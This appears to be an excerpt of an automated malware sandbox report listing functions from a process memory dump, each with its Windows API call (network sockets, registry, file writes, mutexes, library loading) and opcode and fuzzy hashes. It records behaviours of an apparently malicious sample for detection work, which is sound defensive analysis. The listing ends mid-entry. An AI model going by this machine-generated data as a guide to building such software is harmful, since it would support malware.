
Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: fdd25110fe5ec0313ab0f82f25c591b081bd31a627f99b455422b35527d8bdad
Instruction ID: 336cd79d86173d8aafdcaeffc62becd0be78e503f7dafe18944636b9f7a5840e
Opcode Fuzzy Hash: fdd25110fe5ec0313ab0f82f25c591b081bd31a627f99b455422b35527d8bdad
Instruction Fuzzy Hash: 1621A0714093C06FD312CB65CC55F66BFB4EF87610F0984DBE8848B1A3D624A909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04A22EED, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A22F85

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: eb075937e2920bb3c69c990521dd995ca378c065bc80f22a5b0e5c7942204e73
Instruction ID: ae05d8ecb203245c0f0fd17f0fba82e9808e9ff7b7a7ae823005a3ef954a20e1
Opcode Fuzzy Hash: eb075937e2920bb3c69c990521dd995ca378c065bc80f22a5b0e5c7942204e73
Instruction Fuzzy Hash: 1E218272009380AFD7128F25CC54F56FFB8EF46310F0885DBE9849E193C365A809DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2121B, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A212AA

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 6cf2b8f52e14f8ea2238b2af06e98431d381a7b41b599f5fb0326f20a0f4df0a
Instruction ID: 5bd9871639409342070346b1a6f326476d9d0561f866b77216a95247b67a4e08
Opcode Fuzzy Hash: 6cf2b8f52e14f8ea2238b2af06e98431d381a7b41b599f5fb0326f20a0f4df0a
Instruction Fuzzy Hash: 7F218E72409384AFE7128B65DC54F96BFBCEF46310F1884ABEA84DF152D224A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A204EA, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 04A20575

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 8a58f195c1b00e3c50af9be19f184e813ddf72be77803feb62f1f370c25f3b5c
Instruction ID: 73a49d981f3639bc8db4c581db8bfaccafe7e721ddfb8e12c4e89161d11fbbd6
Opcode Fuzzy Hash: 8a58f195c1b00e3c50af9be19f184e813ddf72be77803feb62f1f370c25f3b5c
Instruction Fuzzy Hash: 0C219FB1509380AFE721CF65CC44F66FFA8EF46210F08849AEE859B252D375E948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A236C2, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04A23741

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b0a33024bcd0aa014ce0ec30061f20074e28026f556e5ad5c358bbba2c980bb6
Instruction ID: 8fa8ec34cb65fedd00119b954b8accb535259e4e5b2d9050792e1cf08db27235
Opcode Fuzzy Hash: b0a33024bcd0aa014ce0ec30061f20074e28026f556e5ad5c358bbba2c980bb6
Instruction Fuzzy Hash: 6221AFB2500204AFEB20DF69DD44F6BBBACEF05710F14896BEE44DB241D664E9099BB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A20007, Relevance: 1.6, APIs: 1, Instructions: 78fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A20091

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d49751e280c879658b431a6d150cb6f6ae5404e34f7b4d9a5cbe5a60f451449b
Instruction ID: 1ab6d95249e8a29ca3c2c6dd93539703835eab58f89f759ef95965e28a9792d5
Opcode Fuzzy Hash: d49751e280c879658b431a6d150cb6f6ae5404e34f7b4d9a5cbe5a60f451449b
Instruction Fuzzy Hash: 1C21B372409380AFE7228F65DC44F67BFB8EF46314F08849BEE849B152C265A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A237AF, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A23840

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: c0bc21d07be78309c05b31d03b81451dd7de12baec056c4c9f4fb911e1a7bca0
Instruction ID: e011b43b62f3f5515f0533f1a9775993106840741b942df80b17df20f9a2d640
Opcode Fuzzy Hash: c0bc21d07be78309c05b31d03b81451dd7de12baec056c4c9f4fb911e1a7bca0
Instruction Fuzzy Hash: 5821A171409384AFEB22CF64DC44F97FFB8EF46310F04889BEA859B152D264A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A234C3, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A2355F

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: 61b70b4a2b44c0475d27868de69504104ddc79e222b7ad84d1c9a8713b0ee916
Instruction ID: 1c869d37bacf608763c319ce0713877caae1c4fcd0e9a11e3a4ff222b3cc93a1
Opcode Fuzzy Hash: 61b70b4a2b44c0475d27868de69504104ddc79e222b7ad84d1c9a8713b0ee916
Instruction Fuzzy Hash: 32219F71409784AFE7128B25DC55FA2FFB8EF07314F0984DBE9889B193D264A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 04A22184, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 04A22215

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ExtentPoint32Text
String ID:
API String ID: 223599850-0
Opcode ID: 0e226c8431f436769dc7b5eb4679e101d5f2e8db752ae07881dc44efa7ee222a
Instruction ID: 0cbef99cd5cc8cca3ae7cff0719a7d7e53f4794968c5e6c0acedb0534272c658
Opcode Fuzzy Hash: 0e226c8431f436769dc7b5eb4679e101d5f2e8db752ae07881dc44efa7ee222a
Instruction Fuzzy Hash: 12213B725093C09FD7128F65DC54B52BFB4EF46220F0984DBED85CF263D229A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2024E, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A202E0

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 12805e5bf9d08af15f5c632c670bd6e89c6c3e6f209efc3c6d31d212bb27784b
Instruction ID: 2e6b26f00c47e7db31d4a8cce9cacee320b7d7db5a580b2434c757134617453d
Opcode Fuzzy Hash: 12805e5bf9d08af15f5c632c670bd6e89c6c3e6f209efc3c6d31d212bb27784b
Instruction Fuzzy Hash: 31218C72509344AFD721CF55CC44F57FFA8EF06310F08849AEA859B252D264E808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2443B, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E2C), ref: 04A244DB

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bfdce867adf36ac1fcdce88ce9215c63b669bd8c2b718b277396458415c374b6
Instruction ID: c1b296e43737206f728999301ba50820375a95c687bc7faad6de484d10a49b90
Opcode Fuzzy Hash: bfdce867adf36ac1fcdce88ce9215c63b669bd8c2b718b277396458415c374b6
Instruction Fuzzy Hash: 1521C5710493846FE722CB14CD45F56FFA8EF06720F1880DAED849F192D2A8A949CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A20F5D, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A20FE3

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: cffaa568b0f759fc9e0c0fd52a0794881a09dcd0918bd8e320e26be29dd405ac
Instruction ID: 31976deed3bf7e05c4199c478ea2f9448c63627558df3a849cfc08a381606ed9
Opcode Fuzzy Hash: cffaa568b0f759fc9e0c0fd52a0794881a09dcd0918bd8e320e26be29dd405ac
Instruction Fuzzy Hash: 87218371509384AFE721CF65DC44F96FFA8EF46310F0884ABEE449B152D274A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A238C2, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04A23936

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b678ef97532376bbf452761b2a2b09ba98055b1d7a5916575a222d5decc7ad53
Instruction ID: 3b86ece4a82aa434dca2c407b9ce28d7cb60fae4e0eb244226843f0ca8293614
Opcode Fuzzy Hash: b678ef97532376bbf452761b2a2b09ba98055b1d7a5916575a222d5decc7ad53
Instruction Fuzzy Hash: 4521A171500314AFEB209F29DD44F6BFBA8EF45710F14846BED459B641D274A8099B71

Uniqueness

Uniqueness Score: -1.00%

Function 04A256C0, Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,353CADAB,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04A25738

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6bd94818b0552fc8988f9de29a2f57ba622834bfd04477fb23db91da1b0ed0f3
Instruction ID: c281685b79f9c3b25a8ea86e1b5b97904a9c0278617bb55ae042a3105ad3487a
Opcode Fuzzy Hash: 6bd94818b0552fc8988f9de29a2f57ba622834bfd04477fb23db91da1b0ed0f3
Instruction Fuzzy Hash: 2E2180755093C0AFD7138B29DC94652BFB4AF47220F0984DADD84CF263D264A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04A20986, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 04A209F9

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 35e0b2bac97e1213870db3f2629c2bee6a6d38fd43a2eacff8029f35f008a74d
Instruction ID: 0bd055b96b93f9cf7d0da14ad0b93516f0b7296c8ca931749265a686ad5cf870
Opcode Fuzzy Hash: 35e0b2bac97e1213870db3f2629c2bee6a6d38fd43a2eacff8029f35f008a74d
Instruction Fuzzy Hash: 7B218E71604200AFF720DF69CD85B66FBE8EF04710F1484AAEE499B242D775E805CB75

Uniqueness

Uniqueness Score: -1.00%

Function 04A233FE, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A23479

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 91c104b7b5a29cb1b6b6b1cc32c1e2ed8e0ed523bf7a625bbcf95e047f57e4f3
Instruction ID: cec7ed289b5d6a6bed9e86222891d21acea36f0256c5e31d08ee8ab0d6d790af
Opcode Fuzzy Hash: 91c104b7b5a29cb1b6b6b1cc32c1e2ed8e0ed523bf7a625bbcf95e047f57e4f3
Instruction Fuzzy Hash: 6121BE71500A00AFEB21CF69CD84F67FBE8EF05311F0488AAEE458B211D278E809DB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A26766, Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A267EE

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 70c7716d06cc0c31fe7cf6802c8bd45b380e538db32dcb8c593f36bbd22d302b
Instruction ID: dddec4a7f5ef4f38fd24ed7df1e19267ecbe41b08c8dfe4c6261b003d9fd914b
Opcode Fuzzy Hash: 70c7716d06cc0c31fe7cf6802c8bd45b380e538db32dcb8c593f36bbd22d302b
Instruction Fuzzy Hash: 29218071409380AFE7228F64DC44F66FFB8EF46310F1885ABED849B152C275A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A21041, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A210BF

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 63acd5364a5da73ca818523122bd03f5cb0554c63278a9a37c224be6b56f21a4
Instruction ID: abf2b473266f34c3465f36887ae8026c412ef72f426e98a9ea94bc7d1f32669a
Opcode Fuzzy Hash: 63acd5364a5da73ca818523122bd03f5cb0554c63278a9a37c224be6b56f21a4
Instruction Fuzzy Hash: A9218471409384AFE712CF65DC45F56FFB8EF46310F08849BEE849B152C274A905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2560C, Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 04A25684

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 28dbca3a8ba346bdec67f9647ecb1d89a2283491af63d60bb31db641d07dbefc
Instruction ID: 5dc2a7684df7cd4ca19c22f95280d6c730abfc3e753e5a3a700a5b89eaf6a563
Opcode Fuzzy Hash: 28dbca3a8ba346bdec67f9647ecb1d89a2283491af63d60bb31db641d07dbefc
Instruction Fuzzy Hash: AA21C2724097C06FDB138F25DC50A62FFB4EF07320F0C84CAED858A263C265A958DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2050A, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 04A20575

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: bc66486c033327dae5ab036c348cfe8da165810110bd1ea853924bb22afbd416
Instruction ID: 0830a84b231eeef6ea02d57aadaa1cbb5ad022f6ffb2c4e122cad1c1c218fd99
Opcode Fuzzy Hash: bc66486c033327dae5ab036c348cfe8da165810110bd1ea853924bb22afbd416
Instruction Fuzzy Hash: 3421AE71504200AFE720DF29CD85B66FBE8EF09320F14846AEE858B241D275F804CB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A21142, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

accept.WS2_32(?,?), ref: 04A211AD

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: accept
String ID:
API String ID: 3005279540-0
Opcode ID: bea5b0df3f06cc5b59ee9910a7ef8afc1a9582fc3910703a096998772789bacb
Instruction ID: 6a688a8db389a5090d5c598e69a79a5f381640c8ed7ce8fba88a714033172259
Opcode Fuzzy Hash: bea5b0df3f06cc5b59ee9910a7ef8afc1a9582fc3910703a096998772789bacb
Instruction Fuzzy Hash: CA21AE70501300AFE720DF29DD84FA6FBE8EF04320F1484AEED449B242D771A908CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A2060A, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 04A2067E

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 4af3d2d4be7c226b59365cd5bea10f3be593ad45626dcf61bef86d0340467908
Instruction ID: 9d6ec8d294b407ae0f30170ded326dc579020af109d026ea8a1ad7cedd5f5025
Opcode Fuzzy Hash: 4af3d2d4be7c226b59365cd5bea10f3be593ad45626dcf61bef86d0340467908
Instruction Fuzzy Hash: 1621AE71504204AFE721DF19DD84FA6FBE8EF48320F14845AEA849B251D3B5B909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2500A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A2506E

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: c3578c5ea416c01f3409fa71079315d8e11f05b1525dc1b14845064a7336f99a
Instruction ID: 44d5863d9f2f3928a82d1425c0e1da875172860697426d328c536a6c900ee947
Opcode Fuzzy Hash: c3578c5ea416c01f3409fa71079315d8e11f05b1525dc1b14845064a7336f99a
Instruction Fuzzy Hash: 71118171904204AFEB20CF29DD85F6ABBE8EF45320F14846BEE45DB251D674E808DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A23DD2, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04A23E4E

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: ae1917e18f6794d811688dbb608e20103e112b1a7701703092d374cf09acf4c0
Instruction ID: ce8a9f6b105c10943d4e23b8096d753419cf7fa1c6c95b2f3ab82d0ba9b3bc17
Opcode Fuzzy Hash: ae1917e18f6794d811688dbb608e20103e112b1a7701703092d374cf09acf4c0
Instruction Fuzzy Hash: 36215E71409384AFDB228F65DC44B62BFF4EF46210F0885DAED858B162D279A819DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A235D2, Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 04A23635

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: fb8990b9ff8a244bf852d4cfdc7803b6b965f3ee8dd7f669ae81e0aaaa74cec7
Instruction ID: d26585a5c610a26d8b8e2e7f2cdfd847e5f6f51c70bfd4e202efffcf4c1c36d0
Opcode Fuzzy Hash: fb8990b9ff8a244bf852d4cfdc7803b6b965f3ee8dd7f669ae81e0aaaa74cec7
Instruction Fuzzy Hash: B0119071500204AFEB10DF29DD85F6BFBACEF45720F14846BEE449B241D678A9098B75

Uniqueness

Uniqueness Score: -1.00%

Function 04A2026E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A202E0

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: eefb113b9ed8217637e3fe86b7a111e69b134b54334e4d9169b58e852204676d
Instruction ID: 4ce6626c77f0e871ff56c8e51680050a49eaee78c42a99c5e09552238867f0bd
Opcode Fuzzy Hash: eefb113b9ed8217637e3fe86b7a111e69b134b54334e4d9169b58e852204676d
Instruction Fuzzy Hash: ED11AC72504604AFEB20CF19CD84FA7FBE8EF09710F04846BEA459B251D660F808DB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A21A6D, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04A21AE9

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: d7fd086f9e0dd8f16b913be213e1ab19c3efa1ef2308e9f118a1e020086ce530
Instruction ID: 6e662574c6e5bbe7c21f5be0452fff677962b748f75f91e106b8fbcddd3f0a35
Opcode Fuzzy Hash: d7fd086f9e0dd8f16b913be213e1ab19c3efa1ef2308e9f118a1e020086ce530
Instruction Fuzzy Hash: 1821C0B1508384AFD7228F29DC44B62BFF8EF06310F0880CAED848B253D265E808DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A237D6, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A23840

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 7cb104c9c1caa6ba997a9f190bf61154836386949583335537e77d1a6a5fbcc6
Instruction ID: 8c04e7e39e95e91eed45ce3abedb1556c465ff4487c91ec5365e91f2055d5efa
Opcode Fuzzy Hash: 7cb104c9c1caa6ba997a9f190bf61154836386949583335537e77d1a6a5fbcc6
Instruction Fuzzy Hash: 3B11AF71400204AFEB21CF69DD44FA6FBA8EF05310F14846BEE459B211D674A5098B71

Uniqueness

Uniqueness Score: -1.00%

Function 04A20C56, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A20CB5

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 0b27dd9cf8ad9b2dcce550b961c2bd8178788b414e31ac17a678c1b02aa38843
Instruction ID: 357f338c97bc199a91c0734ed9ce2a1365794f57f15bf0b415483e7ca7db48e8
Opcode Fuzzy Hash: 0b27dd9cf8ad9b2dcce550b961c2bd8178788b414e31ac17a678c1b02aa38843
Instruction Fuzzy Hash: F611E2B2504200AFEB21CF69DD44F6BFBA8EF04320F14846BEE459B251D670A805DB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A266AA, Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A26706

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 7a6885eaac91be92b55d76f4ba0b72e30f58a1e4c361f3ab854037e83dd237c9
Instruction ID: 4f130312d350c1eb905096298990a1aafb54a121067880ecaefbeae48ac42d2c
Opcode Fuzzy Hash: 7a6885eaac91be92b55d76f4ba0b72e30f58a1e4c361f3ab854037e83dd237c9
Instruction Fuzzy Hash: D111C4B1500600AFEB20CF29DD85F67FFA8EF45720F1484ABEE459B241D674A805DB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A21246, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A212AA

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 3acb0c482f7bd738abe0ddb1e12d216c77b692c0241082e60e9e97fa6e970d40
Instruction ID: ecd20f35f758d2c07115dd4d61309f9580f3afc95ce3d8af32b19800bc354421
Opcode Fuzzy Hash: 3acb0c482f7bd738abe0ddb1e12d216c77b692c0241082e60e9e97fa6e970d40
Instruction Fuzzy Hash: 6C116071500204AFE711DF59DD84F97FBACEF45320F14846BEE45DB241D674A5058BB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A24F22, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A24F7E

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: de5816c84d345dbc727bc309083e8c7b65b86b519bacc4ac9ebc1b9b2daaf5a6
Instruction ID: d6a8bc7458ccbb467315b72889c32ee76905bd21ed24a919a627cc40a61d7a45
Opcode Fuzzy Hash: de5816c84d345dbc727bc309083e8c7b65b86b519bacc4ac9ebc1b9b2daaf5a6
Instruction Fuzzy Hash: 8411E271500200AFEB20CF29DD84F66FBA8EF44720F14846BEE458B281D674B8049B71

Uniqueness

Uniqueness Score: -1.00%

Function 04A201AA, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetIfEntry.IPHLPAPI(?,00000E2C,?,?), ref: 04A20221

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Entry
String ID:
API String ID: 3940594292-0
Opcode ID: 2db661fecb4d71dc0f34da9bbe74ea665912e56aff923d73f696adaaf112327a
Instruction ID: 71ee324c37d65df7f412e991cea720da547c00c2bda1298e47407b61259fcbf4
Opcode Fuzzy Hash: 2db661fecb4d71dc0f34da9bbe74ea665912e56aff923d73f696adaaf112327a
Instruction Fuzzy Hash: BE11B271504380AFD3128B16DC41F36BFB8EFC6A20F19819AED448B692D225B915CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 04A20F82, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A20FE3

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: getsockname
String ID:
API String ID: 3358416759-0
Opcode ID: 664641a1e3a6b29e70072c29f68ecbdb01cd183c72ecf593b2fc2017e943d616
Instruction ID: e299f95e1c8a0a2a0ca4fe1e2a94ac4c86644cd5a4227ddba64ed67d32dea774
Opcode Fuzzy Hash: 664641a1e3a6b29e70072c29f68ecbdb01cd183c72ecf593b2fc2017e943d616
Instruction Fuzzy Hash: 7F11BF71504200AFE720CF69DD84FA6FBA8EF45320F14C4ABEE099B281D674A808DB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A24996, Relevance: 1.6, APIs: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

